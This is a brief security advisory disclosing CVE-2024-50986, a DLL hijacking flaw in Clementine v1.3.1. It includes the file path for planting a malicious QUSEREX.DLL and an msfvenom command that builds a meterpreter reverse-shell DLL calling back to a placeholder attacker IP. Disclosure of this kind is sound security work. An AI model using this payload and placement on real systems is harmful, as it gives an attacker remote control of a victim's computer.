
An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)
Description: An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.
Version Affected: Clementine v.1.3.1
Researcher: Utkarsh (r1971d3) LinkedIn
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
Vulnerability Type: Untrusted Search Path
Affected Component: QUSEREX.DLL
To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



